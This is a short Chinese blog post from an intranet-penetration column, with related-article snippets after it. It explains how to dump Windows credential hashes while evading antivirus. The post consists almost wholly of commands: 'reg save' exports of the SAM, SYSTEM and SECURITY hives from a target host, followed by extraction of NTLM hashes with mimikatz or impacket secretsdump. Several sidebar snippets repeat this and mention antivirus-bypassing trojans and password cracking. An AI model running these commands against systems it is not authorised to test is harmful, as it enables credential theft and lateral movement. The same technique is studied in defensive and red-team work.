密码抓取--reg免杀抓hash

已于 2024-01-11 16:19:08 修改
阅读量1.1k 收藏 1
点赞数
分类专栏: 内网渗透 文章标签: reg hash 密码抓取
于 2020-02-13 19:09:15 首次发布
本文为博主原创文章,未经博主允许不得转载。
本文链接:https://blog.csdn.net/lhh134/article/details/104300838
版权

1、下载下面3个文件

reg save HKLM\SYSTEM sys.hiv 
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv

2、获取密码hash
方法1:使用mimikatz(本地机器系统与位数最好与目标主机保持一致)
mimikatz.exe “lsadump::sam /system:sys.hiv /sam:sam.hiv” exit
在这里插入图片描述
方法2:python脚本
python /root/impacket/examples/secretsdump.py -sam sam.hiv -security security.hiv -system sys.hiv LOCAL

LQxdp
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
内网渗透体系学习4
m0_55772907的博客
10-25 902
内网
Hash.reg 快捷计算哈希值 #资源达人分享计划#
08-05
这是一个快捷计算哈希值等其他值的注册表文件,注册完成后,直接用鼠标右键文件就找到 HashTest 就可以进行计算哈希值,可计算MCTripleDES,MD5,RIPEMD160,SHA1,SHA256,SHA384,SHA512的值,方便好用快捷(我个人是这么认为的)
sam文件获取与解密
热门推荐
Shanfenglan's blog
08-21 29万+
前言 ntds.dit文件位置: C:\Windows\NTDS\NTDS.dit system文件位置:C:\Windows\System32\config\SYSTEM sam文件位置:C:\Windows\System32\config\SAM #通过SAM数据库获得用户hash的方法 远程读取 mimikatz在线读取SAM数据库 privilege::debug token::elevate lsadump::sam powershell 利用empire里面的一个powershell
windows账户安全(通过mimikatz、Jhon获取用户密码)
qq_62729556的博客
07-23 2169
使用命令“john-format=NT hash.txt”使用Jhon自带的字典碰撞hash值进行破解。第一步:使用管理员权限,切换到c盘路径,执行命令“reg save hklm\sam sam.hive”和“reg save hklm\system system.hive”将注册表中SAM、System文件导出到本地磁盘。命令“ samdump2 system.hive sam.hive > hash.txt ” 使用sam dump 2工具将sam数据库文件破解成可识别的NTLM hash
mimikatz免杀之通过SAM和System文件抓取密码
m0_47083622的博客
04-19 8558
最近学习使用Mimikatz工具抓取Windows密码时发现Procdump、SQLDumper、DumpMinitool等一系列能导出lsass进程的工具已经被360“拉黑”了。不过还可以通过SAM和System文件抓取密码Hash,目前测试360和火绒都不会拦截 以下为操作: 利用注册表命令将目标机的sam或者system文件导出 reg save hklm\sam sam.hive reg save hklm\system system.hive 然后将目标机上的sam.hive和syst
hash-wasm-benchmark:Hash-wasm 基准测试应用
08-04
"hash-wasm 基准测试" 描述简单明了,表明这个项目专注于对"hash-wasm"进行性能测试,这可能是针对不同哈希函数在WebAssembly环境下的执行效率进行的一系列测试。 **标签解析:** 1. **benchmark** - 指的是性能...
comparaison.rar_hash_min-hash
07-13
"comparaison.rar_hash_min-hash" 这个标题暗示了这是一个关于比较(comparaison)的项目,特别关注于哈希(hash)技术中的最小哈希(min-hash)算法。".rar" 文件是压缩包格式,表明包含的资源是一个压缩文件。 **...
hash密码抓取工具大全
03-25
hash密码抓取提取密码工具大全
MD5-Hash哈希值计算工具
09-07
一个完全免费而且体积小巧的哈希值计算程序,支持字符串和文件的哈希值计算。 目前可以计算的哈希值类型包括:MD5、SHA1、CRC32,支持拖放,大家在使用的时候只需把你需要计算哈希值的文件拖放到程序窗口中即可。
hashcat-6.1.1
12-29
hashcat-6.1.1 hashcat-6.1.1 hashcat-6.1.1hashcat-6.1.1hashcat-6.1.1hashcat-6.1.1
破解Windows本地账户密码(拿到明文密码
最新发布
zhangkexin3的博客
01-26 797
破解Windows本地账户密码
读取 Windows Hash 密码两种方式
weixin_46079186的博客
12-10 951
管理员执行cmd reg save HKLM\SYSTEM C:\sys.hiv reg save HKLM\SAM C:\sam.hiv 导出注册表文件 下载mimikatz https://github.com/gentilkiwi/mimikatz/releases 配置环境变量 我们在c盘目录下,命令行直接执行 mimikatz.exe lsadump::sam /sam:sam.hiv /system:sys.hiv ...
学习记录:内网穿透+ShellCode+C++语言二次编译 免杀绕过火绒 渗透Win10提取密码
qq_60709081的博客
06-24 2023
攻击机:Kali (虚拟机)靶机: Windows 10 22H2 版本 10.0.19045(物理机)工具:MSF,VS,花生壳通过C++二次编译制作免杀木马,绕过火绒检测,实现对靶机的控制,windows本地提权,获取并破解用户密码。今天又进步了一点点,之后打算去打基础了,一步一步来。但毕竟做任何事都要有些动力的,做一个ScriptsKids反倒可以增加自己的兴趣和动力呢。🎉✨免责声明:本文仅作学习、深研而用,若有犯罪行为,一切后果自负,与本文作者无关。
Windows密码凭证获取学习
crowsec
08-08 4550
一般来说,在我们获取到Windows的system权限之后,一般都喜欢去看下密码,哪怕是hash,也想尝试去解一下,Windows下的安全认证机制总共有两种,一种是基于NTLM的认证方式,主要用在早期的Windows工作组环境中;另一种是基于Kerberos的认证方式,主要用在域环境中。...
ATT&CK-T1003-002 - 操作系统凭据转储:安全帐户管理器
swordheart的博客
12-07 580
攻击者可能会尝试通过内存技术或通过存储 SAM 数据库的 Windows 注册表从安全帐户管理器 (SAM) 数据库中提取凭证材料。SAM 是一个数据库文件,其中包含主机的本地帐户,通常是使用**** 命令找到的帐户。枚举 SAM 数据库需要 SYSTEM 级别的访问权限。许多工具可用于通过内存技术检索 SAM 文件:或者,可以使用 Reg 从注册表中提取 SAM:然后可以使用 Creddump7 在本地处理 SAM 数据库以检索哈希值。可以通过三个注册表项枚举本地 SAM(SAM 和系统)、缓存凭证(系统
网络安全域内用户Hash获取方式
kali_Ma的博客
12-05 1300
在渗透测试的过程中,当我们已经是域管权限时,就可以实现提取所有域内用户的密码哈希以进行离线破解和分析,这是非常常见的一个操作,这些哈希值存储在域控制器(NTDS.DIT)中的数据库文件中,并带有一些其他信息,如用户名、散列值、组、GPP、OU等于活动目录相关的信息,它和SAM文件一样都是被操作系统锁定的,因此无法直接复制到其他位置以提取信息。NTDS.dit文件位于Windows以下位置: NTDSUTIL是一个命令行工具,它是域控制器生态系统的一部分,其目的是为了使管理员能够访问和管理Windows Ac
内网渗透(抓取明文密码)
qq_42383069的博客
12-26 1231
内网渗透--抓取密码
【知识整理】渗透思路总结
命运的旋律的博客
01-04 1911
渗透思路总结 文章目录渗透思路总结Hacker语法网站IP查找网站IP验证子域名查找旁站查找C段扫描网站支持的HTTP方法使用NMAP脚本扫描使用OPTIONS方法使用KALI中CURL漏洞扫描端口服务扫描网站指纹扫描网站目录扫描漏洞利用(完善中)SQL注入XXEXSSCSRFSSRFCRLF命令执行漏洞文件上传漏洞解析漏洞文件包含漏洞逻辑漏洞系统提权FINAL渗透报告的撰写 进行信息收集,根据开...
内网横向渗透之密码搜集
dzqxwzoe的博客
08-19 178
希望大家多多批评指导,本人也是一个刚刚打开安全大门的弱鸡大家共同努力为网络安全添砖加瓦。希望大家多多批评指导,本人也是一个刚刚打开安全大门的弱鸡大家共同努力为网络安全添砖加瓦。
密码hash函数-SHA256-512
06-10
SHA256和SHA512都是密码学中常用的哈希函数。它们都是一种单向加密算法,可以将任意长度的数据转换为固定长度的哈希值。SHA256生成的哈希值长度为256位,SHA512生成的哈希值长度为512位。 SHA256和SHA512的安全性都非常高,它们被广泛用于数字签名、消息认证、密码存储等领域。在应用中,SHA256和SHA512可以用来验证文件的完整性,确保文件在传输过程中没有被篡改。 需要注意的是,虽然SHA256和SHA512都是单向加密算法,但它们并不是加密算法,而是哈希算法。因此,它们不支持解密操作,一旦数据被哈希,就无法还原为原始数据。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LQxdp

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值